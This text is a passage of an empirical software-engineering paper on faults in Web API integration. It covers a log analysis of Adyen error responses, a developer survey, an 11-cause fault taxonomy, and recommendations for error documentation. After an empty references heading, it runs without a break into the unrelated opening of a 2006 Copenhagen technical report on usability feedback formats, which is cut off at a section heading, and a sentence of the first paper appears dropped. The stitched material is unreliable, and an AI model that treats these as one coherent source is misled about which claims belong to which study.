3 RESEARCH METHODOLOGY The goal of this study is to understand the faults that occur in API integration that can potentially result in production problems for consumers of an API. To this aim, we propose the following research questions: **RQ1. What type of faults are impacting API consumers?** Translating the understanding of faults in one API integration to API integrations in general is difficult, because every API has its own use cases, specific methods and corresponding errors. To enable generalization of the results we identify general causes of faults that can occur in an API integration. **RQ2. What is the prevalence of these fault types, and how many API consumers are impacted by them?** The answer to this question provides insights into the frequency of each type of fault and the impact in terms of number of API consumers. API designers can leverage the information of what types of faults impact users the most when designing an API to lower the probability that these faults take place and result in problems. In addition, the knowledge will help identify what aspects of integration are more difficult to get right, which therefore require more attention in terms of, for instance, documentation. **RQ3. What are the current practices and challenges to avoid and reduce the impact of problems caused by faults in API integration?** Understanding what type of faults occur in API integrations, how often these faults occur and their impact is not enough to determine how the impact of production problems can be reduced. An understanding is needed of the current practices used to avoid and reduce problems, before recommendations for improvements can be made. Similarly, an understanding of the current challenges faced by API consumers is needed to identify areas of improvement. To answer the RQs, we collect and analyze data from two different sources: over 2 million API error response logs from Adyen’s production services, and a survey with API consumers.
We use this first batch of data to identify the types of fault in Web API integration as well as their prevalence. Afterwards, we challenge our findings by means of a survey with 40 API consumers. In the following, we detail each data collection mechanism. 3.1 Analysis of the API error response logs The data extraction approach can be described in four steps: (1) We extract API error responses from production log data to obtain unique API errors, (2) we manually analyze each unique error message in the context of the web service and API method to identify unique faults, (3) the time span covered by the data set is verified to cover enough data, and (4) we derive a set of causes that explain the API integration failures. The logs of the system under study contain information about everything that happened in the production environment. Among the logs are the API requests and corresponding responses. Using domain knowledge of the system, we identified queries to capture the erroneous API response log messages from the entire set of log messages. The data set we use contains 28 days of data and 2.66 million API error responses. To make sure 28 days would provide enough data for the analysis, we measured the amount of new information each new day was bringing to the dataset. We find that, after 14 days of data, at most 2 new faults are identified per day, with the number decreasing as more days pass. For this reason we conclude that the most common and therefore most impactful faults in our data set are discovered within 14 days, and therefore consider the 28 day data set to cover a sufficient time span. In Figure 2, we show the amount of new information that each day adds to the dataset. As the same error can happen more than once, we identify the unique errors (i.e., unique erroneous API response messages) that have happened in the dataset. However, the error messages alone are not enough to explain the faults.
There are messages that indicate one fault, but in practice have a different meaning. For instance, “Unsupported currency specified” appears to be a configuration mistake or an invalid input fault. However, this specific error is caused by a missing value. Other messages, e.g., “Internal error”, are too ambiguous to categorize in the first place. Thus, to reduce the number of unique messages with multiple explanations, we add more context to the unique error messages. To do so, we use the corresponding API method and web service that caused the error. For instance, the message “Invalid amount specified” has multiple explanations that depend on the API method used. Adding context allows for more granularity during analysis. We end up with 363 different errors to analyze. In practice, we observed that the analysis of these errors is an intensive manual task, i.e., for each error, we had to comprehend the failure, inspect the source code, and talk to the developers of the system. Thus, we consider errors that impacted 10 API consumers or more. Following this approach, we analyzed 89 of the 363 errors, which covers approximately 2.44 million (91.3%) of the 2.66 million erroneous API responses. After analyzing each of them, we found 69 different explanations for these 89 errors (we refer to them as fault cases FC-01 to FC-69; they can be found in our appendix [4]), which we use as an input to determine the high-level causes. Identifying the causes and assigning each of them to a fault is an iterative process, based on a detailed qualitative analysis of the fault cases. Investigating a subset of faults gives the intuition needed to define initial causes, which can be assigned to most of the annotated faults. During further analysis, if a fault does not fit into one of the existing causes, we define a new cause. A cause that is too generic may have to be split up into two or more causes, while a cause that is too specific may be joined with another cause.
Categorization can therefore not be described by a predefined set of steps, but is guided by our understanding of the problem domain, and the actual analysis of the cases at hand. After assigning a cause to each fault, we iterate once more over all faults to check that all causes are accurate. Following this procedure we obtain a set of causes that describe faults in API integration in general. Figure 2: The number of newly identified faults in each interval compared to the previous interval. To verify the accuracy of the categorization, we asked a specialist in API integration from Adyen to check a subset of the cause assignments. As our list was already randomized, the specialist validated the first 50% of the assignments. In case the specialist did not agree with the cause, the difference was discussed until agreement was reached. Using this approach, we verify that the causes are understandable and reduce the possibilities of mistakes. At the end, we derived 11 causes that explain faults in Web API integration. In practice, we observed that, due to unclear error messages, about half of the faults originate from error messages that have two or more possible causes. Propagating these causes to the entire 2.43 million error messages would require analyzing each case in isolation. Thus, we are not able to perfectly estimate the prevalence of each cause; rather, we provide lower and upper bounds. The former is calculated by only counting the number of times that a cause unambiguously explains the error (i.e., the error message was clear enough to identify the exact cause) and ignoring the number of times we were not able to precisely identify that the cause was the root cause. The latter is calculated by counting all the times that cause was involved in an error (unambiguously or not). 3.2 Survey with API consumers We challenge the 11 derived causes by testing them outside the scope of the system under study.
To this end, we survey API consumers that have experience with problems related to API integration. For each cause, we ask them whether they have experienced such a situation. We would like the participants to report their experience of what causes API errors to occur, and not what they think causes these errors in general. We pre-tested the survey with five participants to make sure the questions are understandable and to remove possible ambiguities. The participants were asked to read the questions aloud as well as what they were thinking when answering the questions. This helped us understand the participants’ reasoning and identify problematic situations. We posted the survey on the following programming communities: Code Ranch’s Web Services forum, Hackernews and Reddit’s subreddits programming (815,000 subscribers), Webdev (160,000 subscribers), API (600 subscribers) and WebAPIs (235 subscribers). Although the number of subscribers for the first two subreddits is high, the topics are very general, so the expected number of responses from these is relatively low compared to the more specific forums. To increase the response rate, we additionally resorted to non-programming specific media and personal contacts. The survey was shared with the general public on Twitter by two colleagues; one with primarily academic followers (2,500) and the other with a mix of academics and practitioners (4,600 followers). In total, the posts were retweeted 25 times. On LinkedIn our post was viewed approximately 1,000 times and was shared by two connections. Three companies in industry were contacted via personal contacts, of which one was Adyen, the company under study. Lastly, the first author reached out to personal contacts that match the target audience. The survey was online for three weeks; of the 70 participants who answered at least one question, 40 qualified.
We decided to consider partial responses in the results as well, but only those participants who answered questions that are not background related; 11 out of the 40 participants provided partial responses. The survey can be found in our online appendix [4]. 3.3 Characterization of Survey Participants On average, the respondents have over 10 years of development experience and 5 years of API integration experience. 13 of the developers were individually responsible for the API integration and 27 worked in a team of two or more developers. 95% of the respondents answered the survey based on an application that they worked on in a professional setting. The remaining 5% used an API in a hobby project, which however was used in production. According to 28% of the participants, the API they consume can be considered complex; 22% of them consider the API not complex, and 50% were neutral. 13 APIs used by the participants were data management related. For instance, providing data about products and orders, and managing financial and account data. Payment related APIs were considered 6 times. Even though many respondents are from Adyen, a payments company, only 3 of the respondents considered a payment-related API. Other APIs that the participants integrated with are used for authentication, commerce, project management, geocoding and notifications, such as SMS services.
<table> <thead> <tr> <th>Stakeholder</th> <th>Cause</th> <th>Explanation</th> <th>Fault Cases</th> </tr> </thead> <tbody> <tr> <td>End user</td> <td>Invalid user input</td> <td>A fault introduced by invalid input by the end user of the application</td> <td>FC6, FC15, FC19, FC22, FC23, FC33, FC34, FC35, FC36, FC37, FC45, FC63, FC64</td> </tr> <tr> <td>End user</td> <td>Missing user input</td> <td>A fault introduced by missing input by the end user of the application</td> <td>FC3, FC4, FC5, FC7, FC8, FC9, FC17, FC21, FC38, FC61</td> </tr> <tr> <td>End user</td> <td>Expired request data</td> <td>The input data was no longer valid at the moment of processing</td> <td>FC19, FC67</td> </tr> <tr> <td>API consumer</td> <td>Invalid request data</td> <td>A fault introduced by invalid input caused by the API consumer</td> <td>FC1, FC13, FC14, FC20, FC29, FC30, FC31, FC32, FC41, FC43, FC44, FC47, FC51, FC54, FC55, FC66, FC68</td> </tr> <tr> <td>API consumer</td> <td>Missing request data</td> <td>A fault introduced by missing input caused by the API consumer</td> <td>FC10, FC25, FC27, FC28, FC39, FC46, FC48, FC52, FC58, FC59, FC60, FC65</td> </tr> <tr> <td>API consumer</td> <td>Insufficient permissions</td> <td>Not enough rights to perform the intended request</td> <td>FC40, FC49, FC50</td> </tr> <tr> <td>API consumer</td> <td>Double processing</td> <td>The request was already processed by the API</td> <td>FC11, FC18, FC69</td> </tr> <tr> <td>API consumer</td> <td>Configuration</td> <td>A fault caused by missing/incorrect API settings</td> <td>FC26, FC53</td> </tr> <tr> <td>API consumer</td> <td>Missing server data</td> <td>The API does not have the requested resource</td> <td>FC56, FC57</td> </tr> <tr> <td>API provider</td> <td>Internal</td> <td>An internal fault caused by the API</td> 
<td>FC2, FC12, FC62</td> </tr> <tr> <td>Third party</td> <td>Third party</td> <td>A fault caused by a third party</td> <td>FC24, FC42</td> </tr> </tbody> </table> Table 1: The 11 causes of API faults, their related stakeholder, and fault cases (FC) assigned to the cause. 4 RESULTS 4.1 RQ1. What type of faults are impacting API consumers? In Table 1, we show the 11 derived causes. Two causes, related to user input, can be attributed to the end user, who is also responsible for expired request data faults. Most of the causes can be attributed to the API consumer, and the API provider and the third party stakeholder each match one cause. In the following, we detail each of the causes. Invalid user input. Invalid user input regards requests that fail because an end user supplied input that cannot be used to complete the intended action. The invalid information is forwarded by the API consumer to the API. There are multiple types of input invalidity. We observed inputs that (1) do not match a pre-defined list of expected values or ranges, e.g., invalid country code, and month should be between 1 and 12 (FC-06, FC-22, FC-23, FC-35), (2) do not match the expected type or format, e.g., year should be an integer value (FC-15, FC-33, FC-34, FC-37, FC-45, FC-63, FC-64), (3) do not contain the expected length, e.g., CVC code should have three digits (FC-16, FC-36). In practice, invalid user input can be caused by a user who is not aware that certain input is not allowed. Missing user input. Missing user input is strongly related to invalid user input. In this case however, the end user neglects to fill in required information, which causes the subsequent request to fail. We decided to distinguish between missing and invalid user input, because the nature of the mistake is different. An end user that does not fill out a field either forgets to or is unaware that the field is required. This is different from invalid input where the user supplies incorrect information.
We observed cases of missing payment details, such as bank information, card holder name, CVC, expiry month, IBAN, and credit card (FC-03, FC-09, FC-17, FC-21, FC-38, FC-61), as well as missing billing information, such as the city, state, country, and street of the buyer (FC-04, FC-07, FC-05, FC-08).

**Expired request data.** Expired request data faults occur when a request is not handled in time. This happens when the request contains a timestamp that defines the timeframe within which the server has to handle the request (FC-19, FC-67). In Adyen's case, a timestamp is generated when a shopper starts a transaction. When the request comes in, the system checks whether the start of the transaction lies too far in the past. If a shopper takes too much time, an expired request data fault occurs and an error is returned.

**Invalid request data.** Invalid request data faults are caused by input that cannot be handled by the API. There is a multitude of reasons for such a fault to occur. We observe rounding problems, e.g., passing the value 72.20 instead of 72.21 (FC-01, FC-68); functionality not available for the chosen combination, e.g., the chosen bank does not support recurring payments (FC-13, FC-54, FC-55, FC-66); invalid information, e.g., the merchant does not exist (FC-41, FC-43, FC-47, FC-51); bad encoding, e.g., wrong URL encoding (FC-14); bad format or data outside a list of acceptable values, e.g., the amount should be greater than zero (FC-20, FC-29, FC-30, FC-31, FC-32); and using test data in the production environment, e.g., using a testing payment reference in production (FC-44). This is similar to the mistake made by the end user that causes an invalid user input fault; in this case, however, the mistake is made by the API consumer.

**Missing request data.** Missing request data faults are similar to invalid request data faults. However, in this case the API consumer neglects to send in information that is required for the intended action.
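The timestamp check behind expired request data faults can be sketched as follows. The 30-minute window and the `started_at` field are assumptions for illustration, not Adyen's actual values:

```python
import time

# Hypothetical maximum age of a transaction timestamp, in seconds.
MAX_REQUEST_AGE = 30 * 60

def check_not_expired(request, now=None):
    """Reject a request whose start timestamp lies too far in the past.

    Mirrors the 'expired request data' fault: a timestamp generated when
    the shopper starts the transaction is compared against the current
    time when the request is processed.
    """
    now = time.time() if now is None else now
    age = now - request["started_at"]
    if age > MAX_REQUEST_AGE:
        return {"ok": False, "error": "expired_request_data"}
    return {"ok": True}
```

A request started one minute ago passes; one started an hour ago is rejected with an `expired_request_data` error.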
Also in this case we decided to distinguish between invalid and missing request data. We reason that the mistake of not supplying required information is of a different nature than making a mistake by supplying incorrect input. We observe missing cryptographic data (FC-10, FC-25) and various business-related data (FC-27, FC-28, FC-39, FC-46, FC-48, FC-52, FC-58, FC-59, FC-60, FC-65).

**Insufficient permissions.** Insufficient permissions faults are caused by API consumers who attempt to use an endpoint or a resource that they are not allowed to use. We find consumers making this mistake because they attempt to use the production services before they have completed the process of obtaining the permissions for this (FC-40, FC-50), or while waiting for the service to be properly configured (FC-49). We also see API consumers still interacting with the API after their contract has ended and their permissions have therefore been revoked.

**Double processing.** Double processing faults are caused by API consumers that send in a request more than once. The API under study is designed to be idempotent; sending in the same call repeatedly will produce the same result. Double processing faults should therefore not be possible. However, when attempting to repeatedly delete the same remote object, a double processing fault occurs because the reference to this object can no longer be found, e.g., contracts (FC-11) and payment related objects (FC-18, FC-69).

**Configuration.** Configuration faults are caused by incorrect configuration of the API consumer account. The API consumer assumes that certain functionality is set up for their account, while in reality it is configured incorrectly or not set up at all, e.g., the configuration for installments (FC-26) or specific payment methods (FC-53).
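The double-processing behavior described above can be sketched with a toy store: the first delete succeeds, and the repeated delete fails because the object reference no longer resolves. All names here are hypothetical:

```python
class RemoteObjectStore:
    """Toy server-side store illustrating double-processing faults."""

    def __init__(self):
        # Hypothetical pre-existing remote object.
        self._objects = {"contract-42": {"status": "active"}}

    def delete(self, ref):
        # First delete succeeds; the reference is removed.
        if ref in self._objects:
            del self._objects[ref]
            return {"ok": True}
        # Repeating the delete: the reference can no longer be found,
        # which surfaces as a double-processing fault to the consumer.
        return {"ok": False, "error": "object_not_found"}
```

Calling `delete("contract-42")` twice returns `{"ok": True}` first and an `object_not_found` error second, which is exactly the case where idempotency breaks down in the study.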
**Missing server data.** Missing server data faults happen when the API consumer asks for data that used to exist but no longer does, because it was updated, removed or disabled in the past (FC-56, FC-57).

**Internal.** Internal faults occur when the API provider is unable to handle an incoming request for an unanticipated reason. This can be because of a bug, with the system being unable to handle a specific input or an unexpected API consumer interaction. Data replication issues between internal components can result in new data resources not being immediately available on all servers in a distributed API server architecture (FC-02, FC-12). We also observe internal failures in cryptographic routines (FC-62).

**Third party.** A third party fault can result in an API error when handling a request requires the API provider to make use of a third party (e.g., a bank) that does not respond or returns an error (FC-24, FC-42). In this case the request failed and the consumer is notified by means of an error.

In Figure 3, we show how often survey participants experienced production problems with the API due to each of the 11 causes. Missing server data and configuration related problems were experienced relatively more often than other problems. Problems caused by the API provider and third parties, i.e., internal and third party faults, are experienced relatively more often than problems caused by the API consumer or end user. It is to be noted that for third party faults 10 out of 34 respondents did not know whether these problems occurred or regarded the cause as not applicable. Missing request data and missing user input faults both result in fewer problems than invalid request data and invalid user input faults; the latter two are the problems experienced by the most participants.
Expired request data and double processing related problems are not experienced by over half of the participants. Several participants added causes to the 11 we propose. Four participants mentioned that they experienced errors because the API was not responding. We summarize these issues as API downtime, which we consider part of the internal cause. Furthermore, two participants experienced problems caused by hitting the API request limits. We regard these as faults in the insufficient permissions cause: the API consumer is not allowed to make more requests.

**RQ1:** Faults in API integration can be grouped in 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party.

#### 4.2 RQ2. What is the prevalence of these fault types, and how many API consumers are impacted by them?

In Table 2, we show the number of unique faults that occur in each of the 11 causes found during manual analysis. As aforementioned, due to ambiguity we are not able to present the exact percentage of errors and impacted consumers. For this reason, we show the estimated percentage of corresponding API error responses and the estimated percentage of impacted consumers for each cause. For four causes no ambiguity was present, hence exact percentages are given instead of a range. Note that the total percentages for the lower and upper bound do not add up to 100%, due to the estimation in the total number of errors and to the fact that the same consumer may generate different faults. Double processing related errors, in comparison, are also caused by 3 faults, but occurred 36.0% of the time, corresponding to 875,000 errors for 12.3% of the consumers. Two configuration faults cause more than 400,000 errors (16.7%) for 19.9% to 21.4% of the consumers.
This is similar to missing request data, with the difference that this cause has 12 unique faults. Finally, missing server data faults account for 1.5% of the error responses given back to the API consumer, a relatively small share compared to the other causes for this stakeholder. The number of impacted consumers, however, is similar to other causes. The API provider and the third party stakeholder each experience errors in one category, internal faults and third party faults respectively. The number of unique faults caused by these stakeholders is small compared to the end user and API consumer. Third party faults, however, impact more API consumers: an estimated 319 to 682, or 21.8% to 46.6%.

In addition, in Figure 4, we show the survey participants' perceptions of the impact of each cause. We observe that: (1) internal and third party related problems, caused by the API provider and third parties, are experienced as the most impactful on production applications; (2) problems originating from the end user, such as invalid user input and missing user input, have a relatively small impact on the applications using the API; and (3) interestingly, double processing related problems seem to have either no impact, or a relatively large impact compared to the other causes.

#### 4.3 RQ3. What are the current practices and challenges to avoid and reduce the impact of problems caused by faults in API integration?

To understand how API consumers obtain the knowledge necessary to integrate with an API, we asked them how often they used different information sources. Official API documentation is by far the most used: 74% of the respondents indicated that they use this source of information often or very often. Only 10% did not use official API documentation when integrating with the API they selected during the survey. Code examples are the second most used source, with 44% of the participants using them often or very often.
About one-third of the participants use them sometimes. Question and answer websites are used never or rarely by 42% of the participants, while the share of participants that uses this information source very often is relatively low at 10%. The API provider support team is used the least, with only 18% of the participants using this source often or very often.

In addition to the four proposed information sources, the participants mentioned other sources. Four participants mentioned that they used a trial and error approach on the API to discover what is possible and what is not. Three respondents had access to the API's source code or used the schema definition of the web service to understand the workings of the API. Finally, two participants used the source code of existing external libraries that wrap the API to understand how to use it.

When it comes to preventing the problems that they experienced with the API, 13 (of a total of 18) participants mentioned that the documentation was insufficient. Documenting common implementation scenarios could help prevent problems, instead of only stating the different options for API calls. The restrictions of calls and parameters should be more clearly documented, and the API provider should identify the most common API mistakes and describe how to prevent them. In addition, more details on error codes should be given, and edge cases should be highlighted and better explained. Two participants mentioned the need for an API status page to inform the API consumer of any outages. On-call support for any issues was suggested as an improvement by two more participants. The participants suggested both more informative error messages and a categorization of errors based on their similarities. Furthermore, the respondents mentioned the importance of an upgrade policy for the API and the usefulness of more code examples to illustrate the different API calls.
Lastly, one participant suggested that the API provider set up a testing environment that is capable of returning all possible API responses, which allows the API consumer to properly test and handle these responses.

A subset of the participants (n = 15) elaborated on the challenges they face in error handling. One of the main difficulties is understanding the impact of API errors. Three impact perspectives were mentioned: an implementation perspective, a business perspective and an end user perspective. Not knowing the details and impact of an error makes it difficult, from an implementation perspective, to know what the request did and did not do. A participant exemplified: “You send a batch of 20 objects to be saved, but an error gets thrown. However, you don’t know if none of them was saved or all of them but one.” From a business perspective it is difficult to understand the business impact of the error. The error may explain that a parameter is invalid, but the consequences of this remain unclear. Finally, communicating errors to the end user is also experienced as a challenge: “Translating the messages to something actionable by the end user.”

Another challenge in handling errors is finding the appropriate way to recover. Difficulties include insufficient clarity and documentation about the right way to recover from a given error: “Often errors have no clear recovery option or even worse, do not clearly indicate what’s wrong.” Handling errors is difficult when the different flows the application should take, given the API response, are not clear. This is even more difficult when multiple related API calls are made in sequence and can fail with different errors.

The survey participants (n = 29) also apply different strategies to detect problems in their integration.
For 23 respondents, the end user detects problems in the application related to the API integration. Log analysis is the second most effective means of detecting problems, mentioned by 19 respondents. Monitoring dashboards have detected issues for 13 respondents, and both alerts, such as SMS or email, and API integration tests worked for 9 respondents. Five respondents had additional mechanisms in place, among which are “continuous live smoketesting”, “manual tests in production”, and monitoring API tools that can detect downtime and schedule API test cases, such as Runscope Radar.

**RQ3:** API consumers most often use official API documentation to implement an API correctly, followed by code examples. The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration, insufficient understanding of the impact of problems, and missing guidance on how to recover from errors.

### 5 DISCUSSION

In this section, we provide developers with recommendations that we derive from our findings (Section 5.1). We then discuss the possible threats to the validity of this work and the actions we took to mitigate them (Section 5.2).

#### 5.1 Recommendations

We observed that a great challenge for both API providers and consumers is the documentation; providers need to keep it up to date, while consumers need to understand it. The same challenge has been observed by Robillard et al. [17], who propose that API documentation should convey intent clearly, provide code examples, match APIs with scenarios, discuss the penetrability of the API, and have a clear format and presentation. Our findings suggest that an important feature of documentation concerns the possible errors an API may return. We therefore suggest that documentation clearly state which error codes can be returned by the API and under what circumstances. The API provider should enrich API error responses with actionable information.
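As a hypothetical sketch, an enriched error response with such actionable information might look like this; the field names and values are assumptions, not the studied API's actual format:

```python
# Hypothetical enriched error response: besides a code, it carries an
# error type (for generic handling of groups of errors), a handling
# action for the API consumer, a user-facing message, and a flag
# telling the consumer whether retrying can help.
error_response = {
    "status": 422,
    "error_code": "missing_request_data",
    "error_type": "validation",
    "retriable": False,
    "handling_action": "Add the missing CVC field and resend the request.",
    "user_message": "Please enter the card security code (CVC).",
}

def should_retry(response):
    """Generic consumer-side check driven by the enriched fields."""
    return bool(response.get("retriable"))
```

A consumer can then branch on `error_type` for generic handling, show `user_message` to the end user, and use `should_retry` to decide between retrying and surfacing the error.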
An error type allows for generic error handling for groups of errors, a handling action indicates the right action for the API consumer to take to deal with the error, and a user message can inform the end user of the system about the error and the actions needed to proceed. In addition, API providers should also make explicit which errors are ‘retriable’, i.e., where consumers may simply try again, and in which cases there is no way of recovering from the error. As recovering from errors is a fundamental part of the API consumer’s logic, we suggest API providers offer easy-to-use test environments for integrations, where consumers can exercise not only the happy paths, but also the recovery paths. API consumers, on the other hand, should make sure that their application handles all error codes that can be returned by the provider. Finally, error messages are commonly logged by the API provider. Such logs are vital for future inspection and debugging. We suggest that API providers share these logs with their consumers. Toolmakers should step in and build dashboards that provide live insights into the consumers’ API usage and, more specifically, into their errors.

#### 5.2 Threats to validity

In this section, we discuss the possible limitations of this work and our approach to mitigate them. We distinguish between the internal and external validity of our results.

**Internal validity.** Internal validity is concerned with how consistent the result is in itself. Factors that cannot be attributed to our technique, but which can have an influence on the results, are a potential threat to validity: (1) The causes were derived manually and could therefore have been subject to bias or misinterpretation. To reduce this threat we worked closely with the Adyen development and technical support teams to avoid misunderstandings. (2) To discover possible multiple explanations of a fault, we analyzed the error messages for several API consumers. However, it is possible that a fault remained undiscovered because it occurred infrequently. This has a possible impact on our findings. Similarly, we filtered the data for analysis based on 10 or more impacted API consumers. The filtered-out data could be explained by faults that would alter the distribution of faults over the causes. For instance, internal faults could occur more often in the data that was filtered out, posing a potential threat to validity.

**External validity.** External validity is concerned with the representativeness of the results outside the scope of the research data: (1) We used API error log data from Adyen’s platform to determine the fault causes and to provide insights into the frequency of these faults and the consumers they impact. Since these results apply to Adyen only, we cannot generalize them to faults in other APIs. To reduce this threat we verified the completeness of the fault causes by surveying API consumers. (2) An arbitrary window of 28 days of API error logs was selected for fault analysis and categorization. A different 28-day window could, however, have resulted in a different set of faults, and a different number of occurrences and impacted consumers. It would be useful to replicate the analysis on a different time window to investigate the impact on the results. (3) We only obtained 40 survey responses, of which 11 were partial. This sample is insufficient to generalize results about integration, detection, handling and prevention practices, and future work would be required for such generalization.

### 6 RELATED WORK

Wittern et al. [27] identified three challenges for developers calling Web APIs and argue in favor of corresponding research opportunities to support API consumers: 1) API consumers have no control over the API and the service behind it, both of which may change, in contrast to a traditional local library. 2) The validity of a Web API request, in terms of URL, payload and parameters, is unknown until runtime. When using a local library, the compiler can check whether a call conforms to the library’s API interface. Efforts to solve this challenge can help to reduce faults in the following categories we identified: invalid user input and invalid request data. 3) The distributed nature of the API connection comes with a set of issues concerning availability, latency and asynchrony. A different architecture or additional logic may be required to handle these issues.

Suter and Wittern [23] use API usage logs from 10 APIs to infer specifications based on API URLs and parameters, using classification techniques to tag and detect parameters. They conclude that inferring web API descriptions is a difficult problem that is limited mostly by incomplete or noisy input data. Sohan et al. [20] apply a similar approach in which API requests and responses are used to generate documentation. Using actual requests and responses, the tool is able to include examples in addition to the documentation. The authors identified undocumented fields in 5 out of 25 API actions for which they generated documentation. However, the precision of the generated documentation is not validated against a ground truth, making it difficult to assess the usefulness of the proposed generator.

Bermbach and Wittern [5] performed a geo-distributed benchmark to assess the quality of Web APIs in terms of performance and availability. The authors find great variety in quality between different APIs. They make suggestions on how API providers can become aware of these problems through monitoring, and how they can mitigate them through suitable architectural styles. This work discusses an angle of API-related problems which we were not able to cover, as our work only considers API requests for which API consumers received an API response. We do, however, cover third party unavailability, as this results in third party errors for the API consumer.

Wittern et al. [26] attempt to detect errors by statically checking API requests in JavaScript, to overcome the fact that traditional compile-time errors are not available to developers consuming web APIs. Their static checker verifies whether the API requests in the code conform to specifications written using the Open API specification. The authors report 87.9% precision for payload data and 99.9% precision for query parameter consistency checking.

A vast amount of research has been conducted in the field of traditional offline APIs, some of which is relevant to Web APIs as well. Robillard et al. [16] provide a survey on automated property inference for APIs. The authors state that using APIs can be challenging due to hidden assumptions and requirements, which we also found in this work. Robillard et al. [15, 17] also investigated the obstacles of learning traditional offline APIs by surveying developers at Microsoft. Similar to our results, Robillard found that most respondents use official documentation to learn APIs, with code samples as the second most used source of information.

The learnability of an API can be affected by the overall usability of the API itself. Stylos et al. [22] find that if API providers take the effort to refactor their APIs to make them more usable, this can help reduce the errors that occur due to incorrect usage of the API. One such example, shown by Ellis et al. [6], is refactoring the factory pattern in an API to the direct use of constructors. More recently, Stylos and Myers [12] have suggested that API usability techniques are not limited to the world of offline APIs, but are applicable to the world of web APIs as well.

The evolution of an API has an impact on the API clients as well. Linares-Vásquez et al. [10] have shown that breaking changes in Android APIs can have a negative impact on the rating of an Android app. Sawant et al. [19] conducted a study of 25,567 Java projects to show how deprecation of an API feature can impact an API client. Robbes et al. [14] study the ripple effect of API evolution in the entire Smalltalk ecosystem and show that deprecation of a single API artifact can have a wide-ranging impact on the ecosystem. In the case of web APIs, evolution can have a major impact too. Espinha et al. [8] explored the state of Web API evolution practices and the impact on the software of the respective API consumers. The impact of API changes on the clients’ source code was found to depend on the breadth of the API changes and the quality of the clients’ architectural design. Suggestions for API providers include not changing too often, keeping usage data of different features, and doing blackout tests, which involve disabling old versions for a short time to remind developers that changes in the API are coming. In other work, Espinha et al. [7] developed a tool to understand the runtime topology of APIs in terms of the usage of different versions by different users. Wang et al. [25] study the specific case of the evolution of 11 REST APIs, for which they collected questions and answers from Stack Overflow that concern the changing API elements and how API clients should deal with evolution. Li et al. [9] identified 6 new challenges when it comes to dealing with web API evolution as opposed to traditional API evolution. This understanding can be useful for maintenance purposes, where the impact of changes can be evaluated and predicted. Venkatesh et al. [24] mention that to help the integration process one should understand the challenges encountered by client developers. The authors base their analysis on developer forums and Stack Overflow, mining the questions and answers related to 32 Web APIs. They find that the top five topics per Web API category contribute over 50% of the questions in that category. The findings imply that API providers can optimize their learning resources based on the dominant topics.

### 7 CONCLUSION

API errors can indicate significant problems for API consumers. In the system under study over 60,000 API error responses are returned every day, making the potential number of problems and their impact on API consumer applications enormous. Practitioners have written a variety of best practice guides and blog posts on API design and error handling; however, to our knowledge no research had been conducted on what types of API errors occur in practice and what their impact is. Our results show that (1) faults in API integration can be grouped into 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party. Each cause can be attributed to one of the four API integration stakeholders: end user, API consumer, API provider, and third parties; (2) most faults can be attributed to invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and (3) API consumers most often use official API documentation to implement an API correctly, followed by code examples.
The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration, a lack of insight into problems and changes, insufficient understanding of the impact of problems, missing guidance on how to recover, and a lack of detail on the origin of errors. Our findings indicate that the integration between API providers and consumers is still far from ideal. We hope this work motivates researchers to further explore the domain of faults in Web API integration. Furthermore, we hope that API providers use our findings to optimize their APIs to enable better integration, and that API consumers use our ideas to reduce the impact that API errors may have on their applications.

REFERENCES
What Makes a Developer's Heart Tick? Characterizing Effective Feedback from Usability Evaluation

Mie Nørgaard & Kasper Hornbæk
University of Copenhagen, Denmark
Technical Report no. 07/01, ISSN: 0107-8283
December 2006

Abstract

The format used to present feedback from usability evaluations to developers affects whether problems are understood, accepted and fixed. Yet, little research has investigated which formats are the most effective. We describe an explorative study in which three developers assess 40 usability findings presented using five feedback formats. Data suggest that feedback serves multiple purposes. Initially, feedback must be convincing and convey an understanding of the problem. Next, feedback must be easy to use, before merely serving as a reminder of the problem. Prior to working with the feedback, developers rate redesign proposals, multimedia reports, and annotated screendumps as more valuable than lists of problems, which again are rated more valuable than a scenario-type format. After working with the feedback, developers rate the value of the formats alike. This reflects how all formats may serve to remind, but that redesign proposals, multimedia reports, and annotated screendumps best address feedback's initial purpose.

1 Introduction

Since usability studies became established as an important activity in systems development, the effectiveness of usability evaluation methods has been investigated thoroughly (see for instance Jeffries, Miller, Wharton, & Uyeda, 1991; John & Marks, 1997; Sears, 1997). The literature reveals a strong focus on comparing usability evaluation methods, but how evaluation results are fed back to a design team has not been the focus of much work (but see Dumas, Molich, & Jeffries, 2004; Hornbæk & Frøkjær, 2005). This is unfortunate, since one goal of usability evaluation is to improve systems.
To reach this goal evaluations must move beyond solely listing usability problems (UPs) and help developers to decide which UPs to fix and to understand how they can fix them. In one English dictionary (askoxford.com) feedback is described as: ‘Information given in response to a product, performance etc., used as a basis for improvement’. According to this definition feedback needs to fulfill certain requirements to be successful: the receiver needs to understand the feedback and the feedback needs to facilitate a solution to a given problem. To do this, the feedback needs to be convincing. Consequently there are at least two challenges for an evaluator about to feed back results to a development team: First, developers may not be easily convinced about usability problems, either believing that the system is great as it is, or that users eventually will come around to using it (Kennedy, 1989; Seffah & Andreevskaia, 2003). Second, developers might not be hostile to changes, but simply find it difficult to understand a UP because it is vaguely described (Dumas et al., 2004). How evaluators tackle these two challenges can influence the evaluation's impact dramatically. The present explorative study aims at contributing to our understanding of the practical use of different feedback formats, and thus at identifying how we can more successfully feed usability findings back to developers. The study investigates how five feedback formats, which represent different ways an evaluator may deliver usability results, are used and assessed by developers. The results suggest that developers initially value information in addition to a problem description, such as video highlights, contextual screendumps and redesign proposals, but after having worked with the feedback the differences between feedback formats diminish.
We argue that these results are important for usability practitioners as advice for choosing between feedback formats and for researchers as a help to understand the roles of feedback.

2 Related work
Related work can be divided into two categories: one characterizing feedback practices and another concerned with feedback research. Below we discuss the two categories in turn.

2.1 Feedback practices
